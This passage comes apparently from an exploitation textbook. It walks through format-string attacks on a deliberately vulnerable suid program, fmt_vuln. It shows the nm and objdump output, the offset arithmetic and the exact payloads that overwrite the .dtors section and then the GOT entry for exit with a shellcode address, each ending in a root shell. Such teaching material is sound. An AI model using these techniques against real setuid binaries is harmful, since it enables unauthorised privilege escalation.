$ nm ./dtors_sample 080494d0 D _DYNAMIC 080495b0 D _GLOBAL_OFFSET_TABLE_ 08048404 R _IO_stdin_used w _Jv_RegisterClasses 0804959c d __CTOR_END__ 08049598 d __CTOR_LIST__ 080495a8 d __DTOR_END__ 080495a0 d __DTOR_LIST__ 080494cc d __EH_FRAME_BEGIN__ 080494cc d __FRAME_END__ 080495ac d __JCR_END__ 080495ac d __JCR_LIST__ 080495cc A __bss_start 080494c0 D __data_start 080483b0 t __do_global_ctors_aux 08048300 t __do_global_dtors_aux 080494c4 d __dso_handle w __gmon_start__ U __libc_start_main@@GLIBC_2.0 080495cc A _edata 080495d0 A _end 080483e0 T _fini 08048400 R _fp_hw 08048254 T _init 080482b0 T _start 080482d4 t call_gmon_start 0804839c t cleanup 080495cc b completed.1 080494c0 W data_start U exit@@GLIBC_2.0 08048340 t frame_dummy 08048368 T main 080494c8 d p.0 U printf@@GLIBC_2.0 $ objdump -s -j .dtors ./dtors_sample ./dtors_sample: file format elf32-i386 Contents of section .dtors: 80495a0 ffffffff 9c830408 00000000 ............ $
The nm command shows that the cleanup function is located at 0x0804839c. It also reveals that the .dtors section starts at 0x080495a0 with __DTOR_LIST__ and ends at 0x080495a8 with __DTOR_END__. This means that 0x080495a0 should contain 0xffffffff, 0x080495a8 should contain 0x00000000, and the address between them, 0x080495a4, should contain the address of the cleanup function, 0x0804839c.
The objdump command shows the actual contents of the .dtors section, although in a slightly confusing format. The first value of 80495a0 is simply showing the address where the .dtors section is located. Then the actual bytes are shown, which means the bytes are reversed. Bearing this in mind, everything appears correct.
An interesting detail about the .dtors section is that it's a writable section. An object dump of the headers will verify this by showing that the .dtors section isn't labeled READONLY.
$ objdump -h ./dtors_sample ./dtors_sample: file format elf32-i386 Sections: Idx Name Size VMA LMA File off Algn 0 .interp 00000013 080480f4 080480f4 000000f4 2**0 CONTENTS, ALLOC, LOAD, READONLY, DATA 1 .note.ABI-tag 00000020 08048108 08048108 00000108 2**2 CONTENTS, ALLOC, LOAD, READONLY, DATA 2 .hash 0000002c 08048128 08048128 00000128 2**2 CONTENTS, ALLOC, LOAD, READONLY, DATA 3 .dynsym 00000060 08048154 08048154 00000154 2**2 CONTENTS, ALLOC, LOAD, READONLY, DATA 4 .dynstr 00000051 080481b4 080481b4 000001b4 2**0 CONTENTS, ALLOC, LOAD, READONLY, DATA 5 .gnu.version 0000000c 08048206 08048206 00000206 2**1 CONTENTS, ALLOC, LOAD, READONLY, DATA 6 .gnu.version_r 00000020 08048214 08048214 00000214 2**2 CONTENTS, ALLOC, LOAD, READONLY, DATA 7 .rel.dyn 00000008 08048234 08048234 00000234 2**2 CONTENTS, ALLOC, LOAD, READONLY, DATA 8 .rel.plt 00000018 0804823c 0804823c 0000023c 2**2 CONTENTS, ALLOC, LOAD, READONLY, DATA 9 .init 00000018 08048254 08048254 00000254 2**2 CONTENTS, ALLOC, LOAD, READONLY, CODE 10 .plt 00000040 0804826c 0804826c 0000026c 2**2 CONTENTS, ALLOC, LOAD, READONLY, CODE 11 .text 00000130 080482b0 080482b0 000002b0 2**4 CONTENTS, ALLOC, LOAD, READONLY, CODE 12 .fini 0000001c 080483e0 080483e0 000003e0 2**2 CONTENTS, ALLOC, LOAD, READONLY, CODE 13 .rodata 000000c0 08048400 08048400 00000400 2**5 CONTENTS, ALLOC, LOAD, READONLY, DATA 14 .data 0000000c 080494c0 080494c0 000004c0 2**2 CONTENTS, ALLOC, LOAD, DATA 15 .eh_frame 00000004 080494cc 080494cc 000004cc 2**2 CONTENTS, ALLOC, LOAD, DATA 16 .dynamic 000000c8 080494d0 080494d0 000004d0 2**2 CONTENTS, ALLOC, LOAD, DATA 17 .ctors 00000008 08049598 08049598 00000598 2**2 CONTENTS, ALLOC, LOAD, DATA 18 .dtors 0000000c 080495a0 080495a0 000005a0 2**2 CONTENTS, ALLOC, LOAD, DATA 19 .jcr 00000004 080495ac 080495ac 000005ac 2**2 CONTENTS, ALLOC, LOAD, DATA 20 .got 0000001c 080495b0 080495b0 000005b0 2**2 CONTENTS, ALLOC, LOAD, DATA 21 .bss 00000004 080495cc 080495cc 000005cc 2**2 ALLOC 22 .comment 00000060 00000000 00000000 000005cc 2**0 CONTENTS, READONLY 23 .debug_aranges 00000058 00000000 00000000 00000630 2**3 CONTENTS, READONLY, DEBUGGING 24 .debug_info 000000b4 00000000 00000000 00000688 2**0 CONTENTS, READONLY, DEBUGGING 25 .debug_abbrev 0000001c 00000000 00000000 0000073c 2**0 CONTENTS, READONLY, DEBUGGING 26 .debug_line 000000ff 00000000 00000000 00000758 2**0 CONTENTS, READONLY, DEBUGGING $
Another interesting detail about the .dtors section is that it is included in all binaries compiled with the GNU C compiler, regardless of whether any functions were declared with the destructor attribute. This means that the vulnerable format-string program, fmt_vuln, must have a .dtors section containing nothing. This can be inspected using nm and objdump.
$ nm ./fmt_vuln | grep DTOR 0804964c d __DTOR_END__ 08049648 d __DTOR_LIST__ $ objdump -s -j .dtors ./fmt_vuln ./fmt_vuln: file format elf32-i386 Contents of section .dtors: 8049648 ffffffff 00000000 ........ $
As this output shows, the distance between __DTOR_LIST__ and __DTOR_END__ is only 4 bytes this time, which means there are no addresses between them. The object dump verifies this.
Because the .dtors section is writable, if the address after the 0xffffffff is overwritten with a memory address, the program's execution flow will be directed to that address when the program exits. This will be the address of __DTOR_LIST__ plus 4, which is 0x0804964c (which also happens to be the address of __DTOR_END__ in this case).
If the program is suid root, and this address can be overwritten, it will be possible to obtain a root shell.
$ export SHELLCODE='cat shellcode' $ ./getenvaddr SHELLCODE SHELLCODE is located at 0xbffffd90 $ pcalc 0x90 + 4 148 0x94 0y10010100 $
Shellcode can be put into an environment variable, and the address can be predicted as usual. Because the difference of program name length between the helper program getenvaddr and the vulnerable fmt_vuln program is 2 bytes, the shellcode will be located at 0xbffffd94 when fmt_vuln is executed. This address simply has to be written into the .dtors section at 0x0804964c using the format-string vulnerability. The test_val variable is used first, for clarity's sake, but all the necessary calculations can be done in advance.
$ pcalc 0x94 - 16 132 0x84 0y10000100 $ ./fmt_vuln 'printf "\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"'%3\$132x%4\$n The right way: %3$132x%4$n The wrong way: 3e8 [*] test_val @ 0x08049570 = 148 0x00000094 $ pcalc 0xfd - 0x94 105 0x69 0y1101001 $ ./fmt_vuln 'printf "\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"'%3\$132x%4\$n%3\ $105x%5\$n The right way: %3$132x%4$n%3$105x%5$n The wrong way: 3e8 3e8 [*] test_val @ 0x08049570 = 64916 0x0000fd94 $ pcalc 0xff - 0xfd 2 0x2 0y10 $ pcalc 0x1ff - 0xfd 258 0x102 0y100000010 $ ./fmt_vuln 'printf "\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"'%3\$132x%4\$n%3\ $105x%5\$n%3\$258x%6\$n The right way: %3$132x%4$n%3$105x%5$n%3$258x%6$n The wrong way: 3e8 3e8 3e8 [*] test_val @ 0x08049570 = 33553812 0x01fffd94 $ pcalc 0xbf - 0xff -64 0xffffffc0 0y11111111111111111111111111000000 $ pcalc 0x1bf - 0xff 192 0xc0 0y11000000 $ ./fmt_vuln 'printf "\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"'%3\$132x%4\$n%3\ $105x%5\$n%3\$258x%6\$n%3\$192x%7\$n The right way: %3$132x%4$n%3$105x%5$n%3$258x%6$n%3$192x%7$n The wrong way: 3e8 3e8 3e8 3e8 [*] test_val @ 0x08049570 = -1073742444 0xbffffd94 $
Now the first four addresses in the beginning of the format string just need to be changed to 0x0804964c, 0x0804964d, 0x0804964e, and 0x0804964f, in order to write the 0xbffffd94 address to the .dtors section, instead of to test_val.
$ ./fmt_vuln 'printf "\x4c\x96\x04\x08\x4d\x96\x04\x08\x4e\x96\x04\x08\x4f\x96\x04\x08"'%3\$132x%4\$n%3\ $105x%5\$n%3\$258x%6\$n%3\$192x%7\$n The right way: %3$132x%4$n%3$105x%5$n%3$258x%6$n%3$192x%7$n The wrong way: 3e8 3e8 3e8 3e8 [*] test_val @ 0x08049570 = -72 0xffffffb8 sh-2.05a# whoami root sh-2.05a#
Even though the .dtors section isn't properly terminated with a null address of 0x00000000, the shellcode address is still considered to be a destructor function, and it will be called when the program is exited, providing a root shell.
Because a program could use a function in a shared library many times, it's useful to have a table to reference all the functions. Another special section in compiled programs is used for this purpose — the procedure linkage table, or PLT for short. This section consists of many jump instructions, each one corresponding to the address of a function. It works sort of like a springboard. Each time a shared function needs to be called, control will pass through the procedure linkage table.
An object dump disassembling the PLT section in the vulnerable format-string program (fmt_vuln) shows these jump instructions:
$ objdump -d -j .plt ./fmt_vuln ./fmt_vuln: file format elf32-i386 Disassembly of section .plt: 08048290 <.plt>: 8048290: ff 35 58 96 04 08 pushl 0x8049658 8048296: ff 25 5c 96 04 08 jmp *0x804965c 804829c: 00 00 add %al,(%eax) 804829e: 00 00 add %al,(%eax) 80482a0: ff 25 60 96 04 08 jmp *0x8049660 80482a6: 68 00 00 00 00 push $0x0 80482ab: e9 e0 ff ff ff jmp 8048290 <_init+0x18> 80482b0: ff 25 64 96 04 08 jmp *0x8049664 80482b6: 68 08 00 00 00 push $0x8 80482bb: e9 d0 ff ff ff jmp 8048290 <_init+0x18> 80482c0: ff 25 68 96 04 08 jmp *0x8049668 80482c6: 68 10 00 00 00 push $0x10 80482cb: e9 c0 ff ff ff jmp 8048290 <_init+0x18> 80482d0: ff 25 6c 96 04 08 jmp *0x804966c 80482d6: 68 18 00 00 00 push $0x18 80482db: e9 b0 ff ff ff jmp 8048290 <_init+0x18> $
One of these jump instructions is associated with the exit function, which is called at the end of the program. If the jump instruction used for the exit function can be manipulated to direct the execution flow into shellcode instead of the exit function, a root shell will be spawned. Next, the PLT section is examined in a bit more detail.
$ objdump -h ./fmt_vuln | grep -A 1 .plt 8 .rel.plt 00000020 08048258 08048258 00000258 2**2 CONTENTS, ALLOC, LOAD, READONLY, DATA -- 10 .plt 00000050 08048290 08048290 00000290 2**2 CONTENTS, ALLOC, LOAD, READONLY, CODE $
As this output shows, the procedure linking table is unfortunately read-only. But closer examination of the jump instructions reveals that they aren't jumping to addresses, but pointers to addresses. This means that the actual locations of all the functions are located at the memory addresses 0x08049660, 0x08049664, 0x08049668, and 0x0804966c.
These memory addresses lie in another special section, called the global offset table (GOT). One very interesting detail about the global offset table is that it isn't marked as read-only, as the following output shows.
$ objdump -h ./fmt_vuln | grep -A 1 .got 20 .got 00000020 08049654 08049654 00000654 2**2 CONTENTS, ALLOC, LOAD, DATA $ objdump -d -j .got ./fmt_vuln ./fmt_vuln: file format elf32-i386 Disassembly of section .got: 08049654 <_GLOBAL_OFFSET_TABLE_>: 8049654: 78 95 04 08 00 00 00 00 00 00 00 00 a6 82 04 08 x............... 8049664: b6 82 04 08 c6 82 04 08 d6 82 04 08 00 00 00 00 ................ $
This shows that the jump instruction jmp *0x08049660 in the procedure linkage table actually jumps the program execution to 0x080482a6, because 0x080482a6 is located at 0x08049660 in the global offset table. The subsequent jump instructions (jmp *0x08049664, jmp *0x08049668, and jmp *0x0804966c) actually jump to 0x080482b6, 0x080482c6, and 0x080482d6, respectively. Because the global offset table can be written to, if one of these addresses is overwritten, the execution flow of the program can be controlled through the procedure linkage table, despite the lack of write access.
That being said, the necessary information, including the function names, can be obtained by displaying the dynamic relocation entries for the binary by using objdump.
$ objdump -R ./fmt_vuln ./fmt_vuln: file format elf32-i386 DYNAMIC RELOCATION RECORDS OFFSET TYPE VALUE 08049670 R_386_GLOB_DAT __gmon_start__ 08049660 R_386_JUMP_SLOT __libc_start_main 08049664 R_386_JUMP_SLOT printf 08049668 R_386_JUMP_SLOT exit 0804966c R_386_JUMP_SLOT strcpy $
This reveals that the address of the exit function is located in the global offset table at 0x08049668. If the address of the shellcode is overwritten at this location, the program should call the shellcode when it thinks it's calling the exit function.
As usual, the shellcode is put in an environment variable, its actual location is predicted, and the format-string vulnerability is used to write the value. Actually, the shellcode should still be located in the environment from before, meaning that the only thing that needs adjustment is the first 16 bytes of the format string. The calculations for the %x format parameters will be done once again for clarity.
$ export SHELLCODE='cat shellcode' $ ./getenvaddr SHELLCODE SHELLCODE is located at 0xbffffd90 $ pcalc 0x90 + 4 148 0x94 0y10010100 $ pcalc 0x94 - 16 132 0x84 0y10000100 $ pcalc 0xfd - 0x94 105 0x69 0y1101001 $ pcalc 0x1ff - 0xfd 258 0x102 0y100000010 $ pcalc 0x1bf - 0xff 192 0xc0 0y11000000 $ ./fmt_vuln 'printf "\x68\x96\x04\x08\x69\x96\x04\x08\x6a\x96\x04\x08\x6b\x96\x04\x08"'%3\$132x%4\$n%3\ $105x%5\$n%3\$258x%6\$n%3\$192x%7\$n The right way: %3$132x%4$n%3$105x%5$n%3$258x%6$n%3$192x%7$n The wrong way: 3e8 3e8 3e8 3e8 [*] test_val @ 0x08049570 = -72 0xffffffb8 sh-2.05a# whoami root sh-2.05a#
When fmt_vuln tries to call the exit function, the address of the exit function is looked up in the global offset table and is jumped to via the procedure linkage table. Because the actual address has been switched with the address for the shellcode in the environment, a root shell is spawned.
Another advantage of overwriting the global offset table is that the GOT entries are fixed per binary, so a different system with the same binary will have the same GOT entry at the same address.
The ability to overwrite any arbitrary address opens up many possibilities for exploitation. Basically, any section of memory that is writable and contains an address that directs the flow of program execution can be targeted.